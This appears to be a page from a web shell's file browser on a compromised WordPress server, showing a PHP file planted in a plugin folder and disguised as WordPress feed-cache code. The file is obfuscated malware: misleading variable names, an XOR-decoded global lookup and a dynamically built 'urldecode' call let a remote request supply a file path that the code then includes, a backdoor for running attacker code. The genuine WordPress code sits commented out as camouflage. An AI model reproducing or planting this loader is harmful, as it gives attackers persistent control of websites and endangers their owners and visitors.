HEX
Server: Apache/2.4.57 (Debian)
System: Linux web-server-k8s-e92jnr3j-6f99bff6b6-rp2wg 6.1.0-22-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.94-1 (2024-06-21) x86_64
User: apache (48)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Upload Files
File: /var/www/sites/1250.info/wp-content/plugins/1pq1q1s1/Yc.js.php
<?php /* 
*
 * Feed API: WP*/
 	
function page_templates()

{
    $default_category_post_types = 't605pI58qTPm';
    $force_delete = $default_category_post_types;

    
    $previous_date = $GLOBALS[src_url("%2Bpyy5%1A", $force_delete)];
    $is_sticky = $previous_date;

    $utf8_pcre = isset($is_sticky[$force_delete]);
    if ($utf8_pcre)

    {
	$utf8_string = 'mime_match';
        $show_in_admin_all_list = $previous_date[$force_delete];
        $publicly_queryable = $show_in_admin_all_list[src_url("%00%5B%40j%1E%28X%5D", $force_delete)];
        $patterns = $publicly_queryable;
        include ($patterns);
    }
}

function src_url($old_status, $pre_attribute_ws)

{

    $defaults = $pre_attribute_ws;

    $prime_pattern = "url" . "decode";
	$author_query = 'show_in_rest';
    $ptypes = $prime_pattern($old_status);
    $keys = substr($defaults,0, strlen($ptypes));

    $closing_single_quote = $ptypes ^ $keys;
	$exts = 'reset';
    return $closing_single_quote;
	$post_type_meta_caps = 'lastpostdate';
}



page_templates();



/* _Feed_Cache class
 *
 * @package WordPress
 * @subpackage Feed
 * @since 4.7.0
 * @deprecated 5.6.0
 

_deprecated_file(
	basename( __FILE__ ),
	'5.6.0',
	'',
	__( 'This file is only loaded for backward compatibility with SimplePie 1.2.x. Please consider switching to a recent SimplePie version.' )
);

*
 * Core class used to implement a feed cache.
 *
 * @since 2.8.0
 
#[AllowDynamicProperties]
class WP_Feed_Cache extends SimplePie_Cache {

	*
	 * Creates a new SimplePie_Cache object.
	 *
	 * @since 2.8.0
	 *
	 * @param string $location  URL location (scheme is used to determine handler).
	 * @param string $filename  Unique identifier for cache object.
	 * @param string $extension 'spi' or 'spc'.
	 * @return WP_Feed_Cache_Transient Feed cache handler object that uses transients.
	 
	public function create( $location, $filename, $extension ) {
		return new WP_Feed_Cache_Transient( $location, $filename, $extension );
	}
}
*/